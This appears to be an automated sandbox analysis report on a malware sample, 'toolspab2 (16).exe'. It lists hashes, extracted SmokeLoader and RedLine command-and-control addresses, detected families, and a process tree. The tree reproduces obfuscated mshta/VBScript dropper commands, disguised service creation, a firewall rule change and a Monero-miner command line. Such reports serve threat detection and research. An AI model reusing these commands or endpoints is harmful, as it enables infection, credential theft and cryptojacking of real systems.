Resubmissions
12-07-2021 16:55
210712-cvz622xsbj 1010-07-2021 13:25
210710-pdfh7kft96 1009-07-2021 23:00
210709-hewxkm1xlj 1009-07-2021 16:08
210709-5ql27kyjqa 1009-07-2021 14:08
210709-pt977a4bhe 1008-07-2021 22:09
210708-3ypfnj5j7x 1008-07-2021 13:30
210708-4hsk7y9f2x 1008-07-2021 12:14
210708-8t5f9z9egj 10Analysis
-
max time kernel
374s -
max time network
1829s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
09-07-2021 14:08
General
-
Target
toolspab2 (16).exe
-
Size
315KB
-
MD5
1d20e1f65938e837ef1b88f10f1bd6c3
-
SHA1
703d7098dbfc476d2181b7fc041cc23e49c368f1
-
SHA256
05cd7440851f13dd8f489bb3c06eba385d85d7d9a77a612049c04c541a88593d
-
SHA512
f9d333abe1f721b8d45d7bc6b5f286af09a8d233bd1d41f0ad891840cf742364aeca2cb6ccd6543f56a8eaf32804f82f72f961d16d5ba663ad706d164915a196
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2020
C2
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
rc4.i32
rc4.i32
rc4.i32
rc4.i32
Extracted
Family
redline
Botnet
1
C2
45.32.235.238:45555
Extracted
Family
redline
Botnet
YTMaloy
C2
87.251.71.125:80
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
redline
C2
82.202.161.37:26317
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 2 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 1 IoCs
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner Payload 2 IoCs
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 25 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Deletes itself 1 IoCs
-
Loads dropped DLL 15 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 7 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Kills process with taskkill 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 20 IoCs
-
Suspicious use of AdjustPrivilegeToken 43 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of SendNotifyMessage 4 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe"C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe"C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe"2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\EF3F.exeC:\Users\Admin\AppData\Local\Temp\EF3F.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\F26B.exeC:\Users\Admin\AppData\Local\Temp\F26B.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\4E60.exeC:\Users\Admin\AppData\Local\Temp\4E60.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\4E60.exeC:\Users\Admin\AppData\Local\Temp\4E60.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\52B5.exeC:\Users\Admin\AppData\Local\Temp\52B5.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5564.exeC:\Users\Admin\AppData\Local\Temp\5564.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5E3C.exeC:\Users\Admin\AppData\Local\Temp\5E3C.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\6657.exeC:\Users\Admin\AppData\Local\Temp\6657.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\7537.exeC:\Users\Admin\AppData\Local\Temp\7537.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7537.exeC:\Users\Admin\AppData\Local\Temp\7537.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {16FCA353-E38A-4950-815A-D267C8DEA8A5} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Roaming\ibcdbjhC:\Users\Admin\AppData\Roaming\ibcdbjh2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\ibcdbjhC:\Users\Admin\AppData\Roaming\ibcdbjh3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\41132072-636a-459b-8580-589f5110769c\549E.exeC:\Users\Admin\AppData\Local\41132072-636a-459b-8580-589f5110769c\549E.exe --Task2⤵
-
-
C:\Users\Admin\AppData\Roaming\ttcdbjhC:\Users\Admin\AppData\Roaming\ttcdbjh2⤵
-
-
C:\Users\Admin\AppData\Roaming\ibcdbjhC:\Users\Admin\AppData\Roaming\ibcdbjh2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\549E.exeC:\Users\Admin\AppData\Local\Temp\549E.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\549E.exeC:\Users\Admin\AppData\Local\Temp\549E.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies system certificate store
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\41132072-636a-459b-8580-589f5110769c" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\549E.exe"C:\Users\Admin\AppData\Local\Temp\549E.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\549E.exe"C:\Users\Admin\AppData\Local\Temp\549E.exe" --Admin IsNotAutoStart IsNotTask4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5FE5.exeC:\Users\Admin\AppData\Local\Temp\5FE5.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPt: CloSE ( cREaTEoBJecT ( "wscriPt.shEll" ). Run ( "CMD.Exe /q /C copY /y ""C:\Users\Admin\AppData\Local\Temp\5FE5.exe"" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF """" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\5FE5.exe"" ) do taskkill -iM ""%~NxE"" -f " , 0 , TRuE ) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C copY /y "C:\Users\Admin\AppData\Local\Temp\5FE5.exe" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF "" == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\5FE5.exe" ) do taskkill -iM "%~NxE" -f3⤵
-
C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPt: CloSE ( cREaTEoBJecT ( "wscriPt.shEll" ). Run ( "CMD.Exe /q /C copY /y ""C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE"" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF ""/P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS "" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE"" ) do taskkill -iM ""%~NxE"" -f " , 0 , TRuE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C copY /y "C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF "/P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS " == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE" ) do taskkill -iM "%~NxE" -f6⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipt: clOSe ( CreATeobJECT ( "WScRIpT.SHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C echo G9wY7C:\Users\Admin\AppData\Local\TempEfSQ> XVLAANMN.HX&echo | Set /p = ""MZ"" > P6JDQwUY.2 & COPY /B /y P6JDQwUY.2 + JRtfD7.X + DYta.ASk + I6sjWDN.8 + M0GT.7_ +XVLAANmN.HX ..\FRKN5p.zE & sTArt regsvr32 /u ..\FRKN5P.zE /S& dEl /q * " , 0 , TruE ) )5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C echo G9wY7C:\Users\Admin\AppData\Local\TempEfSQ> XVLAANMN.HX&echo | Set /p = "MZ" > P6JDQwUY.2 & COPY /B /y P6JDQwUY.2 + JRtfD7.X + DYta.ASk + I6sjWDN.8 + M0GT.7_+XVLAANmN.HX ..\FRKN5p.zE& sTArt regsvr32 /u ..\FRKN5P.zE /S& dEl /q *6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "7⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>P6JDQwUY.2"7⤵
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /u ..\FRKN5P.zE /S7⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "5FE5.exe" -f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\75E5.exeC:\Users\Admin\AppData\Local\Temp\75E5.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-0TPOC.tmp\75E5.tmp"C:\Users\Admin\AppData\Local\Temp\is-0TPOC.tmp\75E5.tmp" /SL5="$10196,188175,104448,C:\Users\Admin\AppData\Local\Temp\75E5.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-JGQL4.tmp\134 Vaporeondè_éçè_)))_.exe"C:\Users\Admin\AppData\Local\Temp\is-JGQL4.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec73⤵
- Executes dropped EXE
-
C:\Program Files\Windows Mail\TJYEFYPSYG\irecord.exe"C:\Program Files\Windows Mail\TJYEFYPSYG\irecord.exe" /VERYSILENT4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6UT4E.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-6UT4E.tmp\irecord.tmp" /SL5="$701B0,5808768,66560,C:\Program Files\Windows Mail\TJYEFYPSYG\irecord.exe" /VERYSILENT5⤵
-
C:\Program Files (x86)\i-record\I-Record.exe"C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu6⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7c-9b057-529-d3c93-63020fd0f87ce\Raehidiwovu.exe"C:\Users\Admin\AppData\Local\Temp\7c-9b057-529-d3c93-63020fd0f87ce\Raehidiwovu.exe"4⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e65⤵
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:275457 /prefetch:26⤵
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:1651722 /prefetch:26⤵
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:1258514 /prefetch:26⤵
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:1192997 /prefetch:26⤵
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:930845 /prefetch:26⤵
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad5⤵
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514835⤵
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515135⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\86-85bd1-94d-caaba-32d1ee0ee0217\Pyzhahagyce.exe"C:\Users\Admin\AppData\Local\Temp\86-85bd1-94d-caaba-32d1ee0ee0217\Pyzhahagyce.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\onav1kxd.uqs\GcleanerEU.exe /eufive & exit5⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gqz1xsxi.nfw\installer.exe /qn CAMPAIGN="654" & exit5⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fulorq0w.bmj\google-game.exe & exit5⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hilrvedo.wne\GcleanerWW.exe /mixone & exit5⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ybq00vzx.lho\toolspab1.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\ybq00vzx.lho\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\ybq00vzx.lho\toolspab1.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\ybq00vzx.lho\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\ybq00vzx.lho\toolspab1.exe7⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B788.exeC:\Users\Admin\AppData\Local\Temp\B788.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\B788.exe"C:\Users\Admin\AppData\Local\Temp\B788.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\C2BF.exeC:\Users\Admin\AppData\Local\Temp\C2BF.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\pbkldfrj\2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\uowakbcl.exe" C:\Windows\SysWOW64\pbkldfrj\2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create pbkldfrj binPath= "C:\Windows\SysWOW64\pbkldfrj\uowakbcl.exe /d\"C:\Users\Admin\AppData\Local\Temp\C2BF.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description pbkldfrj "wifi internet conection"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start pbkldfrj2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
-
C:\Windows\SysWOW64\pbkldfrj\uowakbcl.exeC:\Windows\SysWOW64\pbkldfrj\uowakbcl.exe /d"C:\Users\Admin\AppData\Local\Temp\C2BF.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\F65D.exeC:\Users\Admin\AppData\Local\Temp\F65D.exe1⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
-
-
-
C:\Users\Admin\AppData\Local\Temp\A3C.exeC:\Users\Admin\AppData\Local\Temp\A3C.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\F3FF.exeC:\Users\Admin\AppData\Local\Temp\F3FF.exe1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Defense Evasion
File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
4Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16KB
-
Filesize
36KB
-
Filesize
580KB
-
Filesize
584KB
-
Filesize
1.1MB
-
Filesize
128KB
-
Filesize
120KB
-
Filesize
120KB
-
Filesize
120KB
-
Filesize
4KB
-
Filesize
120KB
-
Filesize
20KB
-
Filesize
36KB
-
Filesize
92KB
-
Filesize
88KB
-
Filesize
48KB
-
Filesize
24KB
-
Filesize
76KB
-
Filesize
324KB
-
Filesize
48KB
-
Filesize
8KB
-
Filesize
48KB
-
Filesize
28KB
-
Filesize
44KB
-
Filesize
8KB
-
Filesize
28KB
-
Filesize
204KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.3MB
-
Filesize
9.1MB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
328KB
-
Filesize
8KB
-
Filesize
464KB
-
Filesize
428KB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
620KB
-
Filesize
960KB
-
Filesize
724KB
-
Filesize
696KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
20KB
-
Filesize
36KB
-
Filesize
8KB
-
Filesize
3.0MB
-
Filesize
20KB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
60KB
-
Filesize
8KB
-
Filesize
324KB
-
Filesize
92KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
124KB
-
Filesize
8KB
-
Filesize
2.1MB
-
Filesize
64KB
-
Filesize
84KB
-
Filesize
24KB
-
Filesize
20KB
-
Filesize
1.9MB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
264KB
-
Filesize
19.7MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
100KB
-
Filesize
4KB
-
Filesize
448KB
-
Filesize
108KB
-
Filesize
4KB
-
Filesize
188KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
964KB